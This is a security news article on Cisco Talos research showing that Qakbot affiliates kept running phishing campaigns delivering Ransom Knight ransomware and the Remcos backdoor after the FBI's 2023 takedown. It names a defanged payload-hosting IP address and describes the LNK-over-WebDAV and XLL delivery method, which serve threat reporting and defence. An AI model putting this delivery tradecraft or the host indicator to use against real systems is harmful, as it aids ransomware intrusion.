Qakbot threat still lingering despite FBI takedown

Security researchers have warned that Qakbot-affiliated hackers still remain a pervasive threat despite a high-profile takedown that saw the group’s infrastructure disrupted. 

In August 2023, an operation led by the FBI and international law enforcement partners seized infrastructure assets used by the botnet. “Operation Duck Hunt” severely disrupted Qakbot operations, and resulted in the recovery of thousands of devices infected with malware. 

The takedown was touted at the time as one of the biggest in recent history.

However, researchers at Cisco Talos revealed that the threat actors behind Qakbot are still active and have been waging a ransomware campaign that began “just before the takedown”. 

Observations from Cisco Talos revealed that a variant of Cyclops/Ransom Knight ransomware, as well as the Remcos backdoor malware,  is being used by affiliated threat actors. This suggests the group’s activities weren’t fully shut down by the FBI’s actions and could still pose  a significant threat. 

"As this new operation has been ongoing since the beginning of August 2023 and has not stopped after the takedown, we believe the FBI operation didn’t affect Qakbot’s phishing email delivery infrastructure but only its command and control servers,” researchers said. 

Cisco Talos said that, since August, it has tracked activity by correlating metadata from LNK files used in the new campaign with that used in previous Qakbot campaigns. 

The technique follows previous instances of using LNK file metadata to identify and track threat actors, Cisco Talos said. A machine used in an earlier campaign, dubbed ‘AA’, contained a drive serial number - 0x2848e8a8 - that was used in a later botnet named ‘BB’. 

“Talos identified new LNK files in August 2023 that were created on the same machine referenced above, but observed that the payload of the files pointed to a network share in the command line that served a variant of Ransom Knight ransomware,” researchers explained. 

Analysis of LNK file names used in the recent campaign point to “themes or urgent financial matters”, which Talos said suggests they are being distributed via phishing emails. 

This, the researchers added, is consistent with previous Qakbot campaigns and is a traditional hallmark of the botnet. 

“Some of the filenames are written in Italian, which suggests the threat actors may be targeting users in that region,” they said. 

Cyclops ransomware as a service

Further analysis of LNK files being used in the current campaign have been distributed within Zip archives, researchers said. These also contain an XLL file extension used for Excel add-ins. 

Researchers said the XLL files are the Remcos backdoor, which is typically executed alongside Ransom Knight to gain access to infected machines. 

“The LNK file, on the other hand, downloads an executable file from remote IP 89[.]23[.]96[.]203…via WebDAV, which is the actual Ransom Knight payload,” Talos said. 

This ransomware family was found to be an “updated version of the Cyclops ransomware as a service…rewritten from scratch”. 

Never really gone

The warning from Cisco Talos once again raises questions over the long-term effectiveness of law enforcement ‘takedowns’ such as this. 

This was a key talking point in the immediate aftermath of the August operation and follows several instances of threat actors returning after disruptive incidents.  

A previous operation that took down Trickbot in 2020 appeared to have been successful initially. Within the space of a year, however, the botnet had returned. 

This same scenario also occurred in the aftermath of the Emotet takedown led by Europol in 2021. Emotet re-established itself in the coming months following this operation and continued to pose a major threat to organizations globally.